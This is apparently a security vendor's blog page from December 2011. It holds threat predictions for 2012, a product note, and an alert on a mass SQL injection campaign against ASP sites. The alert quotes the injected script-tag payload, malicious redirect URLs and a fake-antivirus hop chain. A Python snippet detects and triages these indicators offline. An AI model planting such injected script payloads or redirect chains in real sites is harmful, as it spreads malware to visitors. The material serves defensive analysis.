[ General ] 29 December, 2011 17:24

Lionic AegisLab 2012 Security Threat Predictions


    Happy new year to Lionic AegisLab fans. As Santa is just leaving and 2012 is coming, no matter whether it is the end of time or the end of the world next year, we still have to survive on the Internet :-)

 

    In our 2011 predictions, we told you that mobile malware and attacks targeting infrastructure would increase, and they did! For the coming year, based on AegisLab research and investigation, we offer the following trends and remedies to protect yourself from being compromised.


1. Mobile Malware

    In 2011 we faced threats from mobile devices (smartphones and tablets), such as DroidDream, DroidKungFu and Geinimi. Unlike PC viruses, mobile malware does not proactively infect other mobile devices; instead it shows the following behaviors:

  • SMS/Call fraud
  • Malvertising
  • Fake well-known apps (icons that look like Angry Birds or other famous apps)
  • Botnet
  • Stealing sensitive information (GPS location, contacts, IMEI, etc.)

Remedy: Always be wary of suspicious apps and never download from untrusted sources.

 

2. HTML 5 and Web Vulnerabilities

    XSS, SQL injection and CSRF are old-fashioned threats, but they still rank at the top of security incidents. No doubt HTML5 will be the next standard for web applications, and with its powerful features, such as CORS (Cross-Origin Resource Sharing), WebSocket and Offline Applications, various devices and browsers will adopt HTML5 quickly. HTML5 lets apps be written once and run anywhere (and vulnerabilities everywhere?)

 

Remedy: Web programmers should have security awareness and use tools to verify their code.

 

3. Social Networks

    Most people can't live without Facebook, Twitter or Google+. Social networks have become part of your life. Hackers know this and try to lure you. Recently, the free $100 Costco gift card was a Facebook fake and many people were fooled. Moreover, the CSDN and RenRen databases were hacked and people's accounts and passwords were stolen in mainland China.

 

Remedy: Use complex passwords and different passwords on different sites. Check the security risk before following web links.

 

4. Industrial Control Systems (ICS) for Utilities

    ICS such as SCADA (Supervisory Control and Data Acquisition) control water, electricity, oil and gas systems, which are essential to people's everyday needs. As we know, many industrial control systems are not prepared for cyber attacks. Stuxnet and Duqu are worms attacking such systems. SANS ISC unveiled authentication vulnerabilities in Siemens SIMATIC HMI (Human Machine Interface) this month. Smart meters are also increasingly targeted by attackers.

 

Remedy: Secure hardware and enforced security policies.

 

5. White Cloud or Black Cloud?

    Cloud computing has been a hot topic in recent years, for example AWS EC2 and MS Azure. The first question is "Is it safe and reliable enough?". The second point is that people can pay less money to rent large computing resources and storage. But who knows what it will be if the white cloud becomes a black cloud? EaaS (Exploit-as-a-Service) fuels the hacker underground economy.

 

    Web storage and personal clouds will be another security issue. They may encourage piracy and host malicious and porn files. Under insufficient security protection, personal sensitive information may be leaked.

 

Remedy: Don't put personal sensitive information on the cloud, even if the cloud vendor says it's safe! Who knows?

 

6. Attacks on Non-PC Devices

    Ubiquitous computing is coming, especially now that IPv4 addresses are exhausted and IPv6 will apply to every Internet-connected device, such as IP cameras, IPTV set-top boxes and mobile devices. These kinds of non-PC devices lack security functions, but they need them. Whether these functions are embedded in the devices or placed in front of them, you just can't do without them.

 

Remedy: Secure hardware and robust software design.

 

7. APT (Advanced Persistent Threat)

    Operation Aurora, Night Dragon, Shady RAT and LURID are APTs. An APT is a kind of targeted attack, aimed especially at governments, military defense contractors (e.g. Mitsubishi Heavy Industries) and security companies (e.g. RSA). US cyber security experts have reported that 12 groups are behind the bulk of China-based cyber attacks stealing critical data from US companies and government agencies. The Iran nuclear incident was also an APT attack. APTs use social engineering and send mails with .DOC, .PDF or .XLS attachments. Since innocent people see that the mail subject looks important to them, the attachment is not a .EXE, and the antivirus scanner doesn't detect it, they will open it without a doubt.

 

Remedy: Install antivirus and double-check attachments, which can be done with VirusTotal, even when they come from a trusted source: the mail "From" may be forged.

 

Finally, we wish you happy and safe exploring of the world!

By Lionic AegisLab

 

Download English ver. PDF

Download Chinese ver. PDF

 

[ Product News ] 26 December, 2011 18:16


"AegisLab Antivirus Free" New Edition - Supports 14 Languages

    The new version v1.0.4, just uploaded to Google Market, now supports a total of fourteen languages, including English, Simplified Chinese, Traditional Chinese, German, French, Spanish, Portuguese, Korean, Japanese, Dutch, Finnish, Hindi, Malay and Russian. Please go to Google Market and search for "AegisLab"!

[ General ] 23 December, 2011 15:29
[ Security Alert ] 02 December, 2011 17:29

    Per the ISC diary, SQL injection attacks against ASP websites and MSSQL are happening. We can find the following string embedded in the web pages of victim sites:

    ""></title><script src="hxxp://lilupophilupop.com/sl.php"></script>" 

 

(Figure 1: from ISC diary's comment)

The link inside the malicious "sl.php" changes often:

    window.top.location.replace("hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl");

But we know it will redirect to other hopping sites belonging to the IP address 194.28.114.102:

  • hxxp://doutl31inesst.rr.nu
  • hxxp://rthur87seeks.rr.nu
  • hxxp://ift72hbot.rr.nu
  • and more...

These return content as follows:

    <meta http-equiv="refresh" content="0;url=hxxp://www3.simplerfnetwork.rr.nu/?nhyb3c0y=kt3ixnCYZ6msj93Z0KKljNrYsaifqJHi3OWfZpSWrtacpKCcm6WK" />

Finally, you will see the fake AV scanning page (Figure 2), which lures people into downloading the installer; its detection rate is quite low, about 16%.

 

(Figure 2) 

The detailed attack path is as follows:

    [script] hxxp://lilupophilupop.com/sl.php
        [hop] hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl
        [hop] hxxp://www3.simplerfnetwork.rr.nu
        [hop] hxxp://www1.smartscanerjkm.rr.nu
            [download] hxxp://www1.smartscanerjkm.rr.nu

 

Detection rate in VirusTotal (7/43): 

 

Since 02/12/2011, AegisLab WebGuard has blocked these malicious sites.

By AegisLab
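As an added example (not code from the alert or from AegisLab), the following Python triages a stored copy of the hop chain described above offline: it looks for the injected `"></title><script src=` shape in a page, checks the loader's host against the domains named in the alert, and follows `location.replace()` and meta refresh hops through captured responses. The victim URL and the query string on the last hop are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample responses keyed by defanged URL, modelled on the alert's chain
# (injected loader, JS redirect, meta refresh). Victim host and last query are placeholders.
SAMPLE_RESPONSES = {
    "hxxp://victim.example/products.asp":
        '<html><head><title>Widgets""></title><script src="hxxp://lilupophilupop.com/sl.php">'
        '</script>"</title></head><body>Widgets</body></html>',
    "hxxp://lilupophilupop.com/sl.php":
        'window.top.location.replace("hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl");',
    "hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl":
        '<meta http-equiv="refresh" content="0;url=hxxp://www3.simplerfnetwork.rr.nu/?x=1" />',
}
# Domains named in the alert; matched by suffix so every *.rr.nu hop is caught.
BLOCKLIST = ("lilupophilupop.com", "rr.nu")

# Payload shape: '">' breaks out of the attribute, </title> closes the title, script follows.
INJECTED_SCRIPT = re.compile(r'"\s*>\s*</title>\s*<script\s+src=["\']([^"\']+)["\']', re.I)
JS_REDIRECT = re.compile(r'location\.replace\(\s*["\']([^"\']+)["\']\s*\)', re.I)
META_REFRESH = re.compile(r'content=["\']\d+\s*;\s*url=([^"\'\s]+)', re.I)

def host_is_blocked(url, blocklist=BLOCKLIST):
    """True when the URL's host is, or is a subdomain of, a blocklisted domain."""
    host = urlparse(url.replace("hxxp", "http", 1)).hostname or ""
    return any(host == d or host.endswith("." + d) for d in blocklist)

def find_injected_scripts(html):
    """Return the script URLs found in the injected '"></title><script src=' shape."""
    return INJECTED_SCRIPT.findall(html)

def next_hop(body):
    """Next URL from a JS location.replace() or a meta refresh in the body, else None."""
    for pattern in (JS_REDIRECT, META_REFRESH):
        match = pattern.search(body)
        if match:
            return match.group(1)
    return None

def follow_chain(start_url, responses, max_hops=10):
    """Walk the hop chain offline over stored responses; return the URLs visited."""
    chain, url = [], start_url
    while url and url not in chain and len(chain) < max_hops:
        chain.append(url)
        url = next_hop(responses.get(url, ""))
    return chain

def triage_page(url, responses):
    """For each injected loader on a page: its URL, blocklist verdict and hop chain."""
    return [{"loader": src, "blocked": host_is_blocked(src),
             "chain": follow_chain(src, responses)}
            for src in find_injected_scripts(responses.get(url, ""))]
```

Run `triage_page("hxxp://victim.example/products.asp", SAMPLE_RESPONSES)` to see the loader, its blocklist verdict and the three-hop chain; against real data, feed captured page and response bodies instead of the constructed dictionary.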